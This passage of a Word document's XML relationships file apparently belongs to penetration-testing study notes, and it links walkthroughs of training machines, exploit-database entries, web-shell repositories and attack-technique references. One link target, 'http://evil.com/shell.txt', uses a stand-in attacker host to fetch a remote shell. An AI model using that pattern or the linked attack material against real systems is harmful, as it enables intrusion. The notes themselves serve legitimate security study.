Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/roughiz/lfito_rce" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/roughiz/lfito_rce" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/ctf-200-02-offsec-proving-grounds-practice-labor-day-ctf-machine-walkthrough-78a5497ce589" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image395.png"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-62-proving-grounds-zipper-b49a52ed8e38" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-ctf-200-02-6b114263cd04" TargetMode="External"/><Relationship Id="rId939" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/server-side-template-injection" TargetMode="External"/><Relationship Id="rId938" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#identify" TargetMode="External"/><Relationship Id="rId937" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/xxe" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image405.png"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image133.png"/><Relationship Id="rId932" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Secure_cookie" TargetMode="External"/><Relationship Id="rId931" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Secure_cookie" TargetMode="External"/><Relationship Id="rId930" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Session_(computer_science)" TargetMode="External"/><Relationship Id="rId936" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity" TargetMode="External"/><Relationship Id="rId935" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image270.png"/><Relationship Id="rId934" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies#Secure_and_HttpOnly_cookies" TargetMode="External"/><Relationship Id="rId933" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies#Secure_and_HttpOnly_cookies" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image276.png"/><Relationship Id="rId1312" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/snookums-proving-ground-practice-walkthrough-0a8937c6aa2f" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.php.net/manual/en/filesystem.configuration.php" TargetMode="External"/><Relationship Id="rId1313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@robertip/oscp-practice-zenphoto-proving-ground-practice-fe099ba949bc" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image130.png"/><Relationship Id="rId1314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@robertip/oscp-practice-zenphoto-proving-ground-practice-fe099ba949bc" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-slort-2294f5ddde5b" TargetMode="External"/><Relationship Id="rId1315" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@robertip/oscp-practice-extplorer-proving-ground-practice-a9efaa755f6d" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image424.png"/><Relationship Id="rId1316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@robertip/oscp-practice-extplorer-proving-ground-practice-a9efaa755f6d" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-ground-practice-shenzi-10e684479eb9" TargetMode="External"/><Relationship Id="rId1317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/extplorer-proving-grounds-practice-walkthrough-73c076002709" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image531.png"/><Relationship Id="rId1318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@barrattjack89/pg-practice-walla-walkthrough-2e0c33eb284b" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image325.png"/><Relationship Id="rId1319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/pc-proving-grounds-practice-walkthrough-7619983c7d63" TargetMode="External"/><Relationship Id="rId729" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image477.png"/><Relationship Id="rId728" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image472.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.php.net/manual/en/filesystem.configuration.php" TargetMode="External"/><Relationship Id="rId723" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/41154" TargetMode="External"/><Relationship Id="rId965" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wordpress.org/plugins/wordpress-seo/" TargetMode="External"/><Relationship Id="rId722" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image559.png"/><Relationship Id="rId964" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wordpress.org/plugins/elementor/" TargetMode="External"/><Relationship Id="rId721" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image308.png"/><Relationship Id="rId963" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wordpress.org/plugins/duplicator/" TargetMode="External"/><Relationship Id="rId720" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image375.png"/><Relationship Id="rId962" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wordpress.org/plugins/contact-form-7/" TargetMode="External"/><Relationship Id="rId727" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image275.png"/><Relationship Id="rId969" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image220.png"/><Relationship Id="rId726" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image75.png"/><Relationship Id="rId968" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackingarticles.in/wordpress-reverse-shell/" TargetMode="External"/><Relationship Id="rId725" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image229.png"/><Relationship Id="rId967" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@abinus2021/coldbox-easy-walkthrough-d6e78e6a455" TargetMode="External"/><Relationship Id="rId724" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image317.png"/><Relationship Id="rId966" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@abinus2021/coldbox-easy-walkthrough-d6e78e6a455" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://evil.com/shell.txt" TargetMode="External"/><Relationship Id="rId961" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wordpress.org/plugins/classic-editor/" TargetMode="External"/><Relationship Id="rId960" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wordpress.org/plugins/akismet/" TargetMode="External"/><Relationship Id="rId1310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/momenbasel/ccb91523f86714edb96c871d4cf1d05c" TargetMode="External"/><Relationship Id="rId1311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/payday" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image148.png"/><Relationship Id="rId1301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://me0w.medium.com/wpwn-walkthrough-offensive-security-proving-grounds-play-boxes-a824d3519849" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image539.png"/><Relationship Id="rId1302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wpscan.com/vulnerability/7b412469-cc03-4899-b397-38580ced5618/" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-62-proving-grounds-zipper-b49a52ed8e38" TargetMode="External"/><Relationship Id="rId1303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@huwanyu94/proving-grounds-play-sosimple-walkthrough-18bc36ab859e" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viperone.gitbook.io/pentest-everything/writeups/pg-play-or-vulnhub/linux/potato" TargetMode="External"/><Relationship Id="rId1304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-loly-d8724b4466a3" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image165.png"/><Relationship Id="rId1305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/45010" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image426.png"/><Relationship Id="rId1306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Inching-Towards-Intelligence/pg-play-tre-92-100-9b73ef8d0918" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image80.png"/><Relationship Id="rId1307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://johnjhacking.com/blog/oscp-reborn-2023/" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image453.png"/><Relationship Id="rId1308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/50616" TargetMode="External"/><Relationship Id="rId1309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-payday-639f5128b0ca" TargetMode="External"/><Relationship Id="rId719" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.49.112/passwd" TargetMode="External"/><Relationship Id="rId718" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.49.112/passwd" TargetMode="External"/><Relationship Id="rId717" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image127.png"/><Relationship Id="rId959" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image202.png"/><Relationship Id="rId712" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@basha5969/astronaut-proving-grounds-09c2cf63de97" TargetMode="External"/><Relationship Id="rId954" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image508.png"/><Relationship Id="rId711" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/sorcerer" TargetMode="External"/><Relationship Id="rId953" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@abinus2021/coldbox-easy-walkthrough-d6e78e6a455" TargetMode="External"/><Relationship Id="rId710" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image108.png"/><Relationship Id="rId952" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@abinus2021/coldbox-easy-walkthrough-d6e78e6a455" TargetMode="External"/><Relationship Id="rId951" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId716" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image143.png"/><Relationship Id="rId958" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wpscan.com/statistics" TargetMode="External"/><Relationship Id="rId715" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@malwarejoe/xposedapi-offsec-proving-grounds-lab-write-up-3848be2c61d3" TargetMode="External"/><Relationship Id="rId957" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wpscan.com/statistics" TargetMode="External"/><Relationship Id="rId714" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image365.png"/><Relationship Id="rId956" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://wordpwn.py" TargetMode="External"/><Relationship Id="rId713" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/gtfobins/php/#suid" TargetMode="External"/><Relationship Id="rId955" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image320.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image244.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image431.png"/><Relationship Id="rId950" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@abinus2021/coldbox-easy-walkthrough-d6e78e6a455" TargetMode="External"/><Relationship Id="rId1300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Inching-Towards-Intelligence/pg-play-sosimple-53-100-21453c1ef208" TargetMode="External"/><Relationship Id="rId590" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.php.net/manual/en/function.echo.php" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.png"/><Relationship Id="rId349" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://software-sinner.medium.com/offensive-security-proving-grounds-ha-natraj-e11c8053d7cb" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control" TargetMode="External"/><Relationship Id="rId348" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@z6157881/evilbox-one-vulnhub-walkthrough-e60d723c7639" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control" TargetMode="External"/><Relationship Id="rId347" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@z6157881/evilbox-one-vulnhub-walkthrough-e60d723c7639" TargetMode="External"/><Relationship Id="rId589" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.php.net/manual/en/function.system.php" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image189.png"/><Relationship Id="rId346" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image471.png"/><Relationship Id="rId588" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.php.net/manual/en/function.system.php" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image246.png"/><Relationship Id="rId1170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@zeroDaykt/election1-proving-grounds-play-walkthrough-2c35b07844ec" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image91.png"/><Relationship Id="rId1171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image409.png"/><Relationship Id="rId341" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://freedium.cfd/https://medium.com/@yogasatriautama/pg-nukem-296392de8e96" TargetMode="External"/><Relationship Id="rId583" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/meetcyber/proving-grounds-solstice-walkthrough-2c088906ea74" TargetMode="External"/><Relationship Id="rId1172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image212.png"/><Relationship Id="rId340" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/cockpit-proving-ground-practice-walkthrough-c95930e9523d" TargetMode="External"/><Relationship Id="rId582" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://freedium.cfd/https://medium.com/meetcyber/proving-grounds-solstice-walkthrough-2c088906ea74" TargetMode="External"/><Relationship Id="rId1173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@jamesjarviscyber/bbscute-write-up-walkthrough-offsec-provinggrounds-vulnhub-05bad5754e72" TargetMode="External"/><Relationship Id="rId581" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image96.png"/><Relationship Id="rId1174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@d3mi/vegeta1-offsec-proving-grounds-acd77f1b5b61" TargetMode="External"/><Relationship Id="rId580" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image557.png"/><Relationship Id="rId1175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image460.png"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image247.png"/><Relationship Id="rId345" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://systemweakness.com/dc-4-vulnhub-98d97fb0fea4" TargetMode="External"/><Relationship Id="rId587" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image146.png"/><Relationship Id="rId1176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image305.png"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image530.png"/><Relationship Id="rId344" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image134.png"/><Relationship Id="rId586" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/User-Agent" TargetMode="External"/><Relationship Id="rId1177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image398.png"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/debug-programs" TargetMode="External"/><Relationship Id="rId343" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image194.png"/><Relationship Id="rId585" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/User-Agent" TargetMode="External"/><Relationship Id="rId1178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image515.png"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/debug-programs" TargetMode="External"/><Relationship Id="rId342" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image319.png"/><Relationship Id="rId584" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image342.png"/><Relationship Id="rId1179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image242.png"/><Relationship Id="rId1169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gchq.github.io/CyberChef/" TargetMode="External"/><Relationship Id="rId338" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@mahdi_78420/blogger-walkthrough-a6d064b8608e" TargetMode="External"/><Relationship Id="rId337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=xZd1JWmLGLk" TargetMode="External"/><Relationship Id="rId579" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image351.png"/><Relationship Id="rId336" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=xZd1JWmLGLk" TargetMode="External"/><Relationship Id="rId578" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://software-sinner.medium.com/offensive-security-proving-grounds-ha-natraj-e11c8053d7cb" TargetMode="External"/><Relationship Id="rId335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://systemweakness.com/proving-grounds-practise-active-directory-box-access-79b1fe662f4d" TargetMode="External"/><Relationship Id="rId577" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image507.png"/><Relationship Id="rId339" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image74.png"/><Relationship Id="rId1160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId330" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/" TargetMode="External"/><Relationship Id="rId572" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Web_application_firewall" TargetMode="External"/><Relationship Id="rId1161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-internal-e5098dd29793" TargetMode="External"/><Relationship Id="rId571" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Web_application_firewall" TargetMode="External"/><Relationship Id="rId1162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-24-proving-grounds-internal-5e0b8d368c62" TargetMode="External"/><Relationship Id="rId570" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image204.png"/><Relationship Id="rId1163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ayxantanirverdiyev6/pg-practice-kevin-walkthrough-c6f85d5bc0b9" TargetMode="External"/><Relationship Id="rId1164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-6-proving-grounds-kevin-da7ff42e659a" TargetMode="External"/><Relationship Id="rId334" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/TheBinitGhimire/Web-Shells" TargetMode="External"/><Relationship Id="rId576" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/tags/ref_urlencode.asp" TargetMode="External"/><Relationship Id="rId1165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://routezero.security/2024/11/29/proving-grounds-practice-osaka-walkthrough/" TargetMode="External"/><Relationship Id="rId333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/joswr1ght/22f40787de19d80d110b37fb79ac3985" TargetMode="External"/><Relationship Id="rId575" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/tags/ref_urlencode.asp" TargetMode="External"/><Relationship Id="rId1166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://beautifier.io/" TargetMode="External"/><Relationship Id="rId332" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cyberarri.com/2024/03/26/katana-pg-play-writeup/" TargetMode="External"/><Relationship Id="rId574" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Percent-encoding" TargetMode="External"/><Relationship Id="rId1167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ayxantanirverdiyev6/pg-practice-paydaywalkthrough-1d0bddff70f1" TargetMode="External"/><Relationship Id="rId331" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.zacheller.dev/pentest/privilege-escalation/spawning-a-tty-shell" TargetMode="External"/><Relationship Id="rId573" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Percent-encoding" TargetMode="External"/><Relationship Id="rId1168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gchq.github.io/CyberChef/" TargetMode="External"/><Relationship Id="rId370" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image372.png"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image273.png"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image556.png"/><Relationship Id="rId369" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@mahdi_78420/nagoya-walkthrough-practice-tj-3259e8ec1832" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image381.png"/><Relationship Id="rId368" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@anushka18599/offsec-proving-grounds-walkthrough-monster-774a871c6ad7" TargetMode="External"/><Relationship Id="rId1190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@jamesjarviscyber/gaara-write-up-provinggrounds-vulnhub-0168a5beb32e" TargetMode="External"/><Relationship Id="rId1191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@z6157881/cybersploit-1-vulnhub-walkthrough-8537c7b71dcf" TargetMode="External"/><Relationship Id="rId1192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@rzashirinov38/driftingblues-6-vulnhub-walkthrough-8db6ecdb3b46" TargetMode="External"/><Relationship Id="rId1193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cyberarri.com/2024/03/26/katana-pg-play-writeup/" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image503.png"/><Relationship Id="rId363" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-stapler-464f2a8aa6dc" TargetMode="External"/><Relationship Id="rId1194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@mahdi_78420/pyexp-walkthrough-online-b01cf16a2ca5" TargetMode="External"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools/blob/main/NtObjectManager/NtTokenFunctions.ps1" TargetMode="External"/><Relationship Id="rId362" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image488.png"/><Relationship Id="rId1195" 